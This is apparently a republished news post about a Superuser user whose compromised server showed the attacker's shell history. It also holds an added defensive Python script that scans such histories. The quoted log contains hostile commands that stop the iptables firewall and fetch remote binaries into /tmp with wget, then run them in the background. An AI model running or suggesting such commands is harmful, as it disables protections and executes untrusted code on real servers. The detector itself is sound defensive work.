Usually network infrastructure teams have to piece together how they were hacked after the fact, but one developer over on Superuser found themselves watching exactly how a major hack on their infrastructure unfolded.
User Vaid asked on Superuser if their server was compromised after walking away for an hour break and coming back to hundreds of commands written in the terminal window — it turns out that the server was indeed hacked:
    355 service iptables stop
    356 cd /tmp
    357 wget http://ift.tt/1orkiTD
    358 chmod 0755 /tmp/yjz1
    359 nohup /tmp/yjz1 > /dev/null 2>&1 &
    360 chmod 777 yjz1
    361 ./yjz1
    362 chmod 0755 /tmp/yjz1
    363 nohup /tmp/yjz1 > /dev/null 2>&1 &
    364 chmod 0777 yjz1
    365 chmod u+x yjz1
    366 ./yjz1 &
    367 chmod u+x yjz1
    368 ./yjz1 &
    369 wget http://ift.tt/1SIi0fQ
    370 chmod 0755 /tmp/yjz
    371 nohup /tmp/yjz > /dev/null 2>&1 &
There were hundreds of these types of commands in the terminal, which may look like gibberish if you’re not familiar with Linux. In brief, the attackers broke into the server, stopped the firewall and proceeded to download and execute malicious code repeatedly.
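As an added example (not part of the original post or the Superuser thread), the Python below scans a saved `history` listing for the stages visible in the excerpt above: firewall stopped, download into a temp directory, file made executable there, and execution from it. The sample history is constructed, the URL is a placeholder, and TEMP_DIRS, FIREWALLS, the rule names and the starting directory are assumptions of this example.

```python
import posixpath
import re

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # assumed list of world-writable staging dirs
FIREWALLS = ("iptables", "ip6tables", "firewalld", "ufw")

# Constructed sample modelled on the excerpt above; the URL is a placeholder.
SAMPLE_HISTORY = """\
  355 service iptables stop
  356 cd /tmp
  357 wget http://example.invalid/yjz1
  358 chmod 0755 /tmp/yjz1
  359 nohup /tmp/yjz1 > /dev/null 2>&1 &
  361 ./yjz1
  362 vi /etc/hosts
"""

def in_temp(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)

def grants_exec(mode):
    """True if a chmod mode (octal or symbolic) sets an execute bit."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(digit) & 1 for digit in mode[-3:])
    return bool(re.search(r"\+[rwXst]*x", mode))

def analyse(history, start_dir="/root"):
    """Return (history_index, rule, detail) tuples; `cd` is tracked to resolve relative paths."""
    cwd, findings = start_dir, []
    for line in history.splitlines():
        m = re.match(r"\s*(\d+)\s+(\S.*)", line)
        if not m:
            continue
        idx, argv = int(m.group(1)), m.group(2).split()
        argv = argv[1:] if argv[0] == "nohup" and len(argv) > 1 else argv  # look through nohup
        cmd, args = argv[0], argv[1:]
        resolve = lambda p: posixpath.normpath(posixpath.join(cwd, p))
        if cmd == "cd" and args:
            cwd = resolve(args[0])
        elif cmd == "service" and len(args) == 2 and args[0] in FIREWALLS and args[1] == "stop":
            findings.append((idx, "firewall-stopped", args[0]))
        elif cmd in ("wget", "curl") and in_temp(cwd) and any("://" in a for a in args):
            findings.append((idx, "download-into-temp", cwd))
        elif cmd == "chmod" and len(args) >= 2 and grants_exec(args[0]):
            findings += [(idx, "temp-file-made-executable", resolve(t))
                         for t in args[1:] if in_temp(resolve(t))]
        elif "/" in cmd and in_temp(resolve(cmd)):
            findings.append((idx, "executed-from-temp", resolve(cmd)))
    return findings
```

Calling `analyse(SAMPLE_HISTORY)` returns one tuple per suspicious entry, keyed by its history number, so the findings can be lined up against the original listing. The same commands run from a home directory produce no findings, because the rules only fire for paths under TEMP_DIRS.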
from hacker samurai http://ift.tt/1LgUCxK